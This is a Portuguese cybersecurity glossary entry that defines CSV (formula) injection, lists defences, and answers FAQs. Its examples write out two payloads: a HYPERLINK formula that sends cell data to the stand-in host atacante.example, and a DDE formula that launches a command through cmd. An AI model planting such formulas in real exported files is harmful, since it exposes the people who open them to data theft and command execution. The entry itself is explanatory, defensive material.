Injeção CSV
O que é Injeção CSV?
Injeção CSVAtaque que insere fórmulas de folha de cálculo em ficheiros CSV exportados, fazendo com que abrir o ficheiro em Excel ou Sheets execute ações controladas pelo atacante.
A injeção CSV, também chamada injeção de fórmulas, abusa de aplicações de folha de cálculo que avaliam automaticamente células começadas por =, +, -, @ ou tab/quebra de linha. Quando uma aplicação web armazena uma entrada do atacante e depois a exporta para CSV, o livro resultante pode invocar DDE, contactar URLs remotos, exfiltrar dados ou instalar malware ao ser aberto. O risco está no consumidor do ficheiro e não na base de dados, o que torna fácil falhá-lo em revisão de código. As defesas incluem prefixar com apóstrofo ou outro prefixo seguro qualquer célula iniciada por caracteres perigosos, validar e escapar os campos antes da exportação e alertar os utilizadores antes de abrirem folhas não confiáveis.
● Exemplos
- 01
Um formulário de contacto cujo campo Nome aceita =HYPERLINK("https://atacante.example/?l="&A2,"Clique") e exfiltra outras células quando a exportação é aberta.
- 02
Um relatório de CRM exportado com =cmd|'/c calc'!A1 que dispara DDE em versões antigas do Excel.
● Perguntas frequentes
O que é Injeção CSV?
Ataque que insere fórmulas de folha de cálculo em ficheiros CSV exportados, fazendo com que abrir o ficheiro em Excel ou Sheets execute ações controladas pelo atacante. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa Injeção CSV?
Ataque que insere fórmulas de folha de cálculo em ficheiros CSV exportados, fazendo com que abrir o ficheiro em Excel ou Sheets execute ações controladas pelo atacante.
Como se defender contra Injeção CSV?
As defesas contra Injeção CSV costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para Injeção CSV?
Nomes alternativos comuns: Injeção de fórmulas, Injeção de macros do Excel.